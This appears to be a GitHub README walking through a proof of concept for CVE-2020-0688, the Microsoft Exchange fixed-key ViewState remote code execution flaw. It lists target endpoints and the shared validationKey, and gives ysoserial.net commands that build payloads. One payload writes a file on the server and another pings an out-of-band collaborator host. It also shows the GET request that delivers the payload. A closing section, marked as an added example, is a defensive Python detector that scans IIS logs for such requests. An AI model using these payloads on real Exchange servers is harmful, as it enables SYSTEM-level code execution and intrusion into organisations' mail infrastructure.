murataydemir / CVE-2020-0688

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

Instead of having randomly generated keys on a per-installation basis, all installations of Microsoft Exchange Server share the same validationKey and decryptionKey values in web.config. An authenticated attacker can therefore trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, the attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs with SYSTEM privileges.

Step 1: Visit one of the following endpoints to reach the authentication page

  • http(s)://exchangeserver/owa
  • http(s)://exchangeserver/owa/auth.owa
  • http(s)://exchangeserver/owa/auth/logon.aspx
  • http(s)://exchangeserver/ecp
  • http(s)://exchangeserver/ecp/default.aspx

Step 2: Log in with valid credentials (the account's privilege level does not matter), then take the ASP.NET_SessionId value from the HTTP response cookie and the __VIEWSTATEGENERATOR value from the HTTP response body. For example:

  • ASP.NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
  • __VIEWSTATEGENERATOR: B97B4E27
  • validationKey (Fixed): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
  • validationalg (Fixed): SHA1

Step 3: To generate the payload (to check for the vulnerability), use YSoSerial.net

Note that if you have access to the target Exchange server, you can use the following payload, which creates the text file PoC.txt in the C:\ directory as proof.

PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy

However, if you cannot access the server, the following may work better.

PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy

Step 4: After step 3 you will have a URL-encoded ViewState payload. Send a GET request to the endpoint below in the following format

http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
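As an added defender-side example (not part of the original repository), the check below flags IIS W3C log entries shaped like the Step 4 request: a GET under /ecp/ carrying __VIEWSTATE and __VIEWSTATEGENERATOR in the query string, which is unusual because ECP normally sends ViewState in a POST body. The field order and the sample log lines are constructed assumptions.

```python
"""Flag IIS W3C log entries shaped like the Step 4 request above (added example).
ECP normally carries __VIEWSTATE in a POST body, so a GET to /ecp/ with
__VIEWSTATE and __VIEWSTATEGENERATOR in the query string is worth a look."""
from urllib.parse import parse_qs

# Assumed field order for the constructed log lines below (not real traffic).
FIELDS = ["date", "time", "cs-method", "cs-uri-stem", "cs-uri-query",
          "cs-username", "c-ip", "sc-status"]
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2020-02-26 10:01:02 GET /owa/auth/logon.aspx url=%2fowa - 10.0.0.5 200
2020-02-26 10:01:40 POST /ecp/default.aspx - CONTOSO\\alice 10.0.0.5 200
2020-02-26 10:02:11 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=PLACEHOLDER CONTOSO\\alice 10.0.0.5 500
"""

def parse_line(line):
    """Split one W3C log line into a dict; None for comment or short lines."""
    if line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def is_suspicious(entry):
    """True for a GET under /ecp/ that carries ViewState in the query string."""
    if entry["cs-method"] != "GET":
        return False
    if not entry["cs-uri-stem"].lower().startswith("/ecp/"):
        return False
    query = parse_qs(entry["cs-uri-query"], keep_blank_values=True)
    return "__VIEWSTATE" in query and "__VIEWSTATEGENERATOR" in query

def find_hits(log_text):
    """Return (client ip, user, status, generator) for each matching entry."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            gen = parse_qs(entry["cs-uri-query"])["__VIEWSTATEGENERATOR"][0]
            hits.append((entry["c-ip"], entry["cs-username"], entry["sc-status"], gen))
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print("possible CVE-2020-0688 attempt:", hit)
```

The matching entry also records the user name, since the request must come from an authenticated session, which helps scope the follow-up investigation.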

The original blog post is available here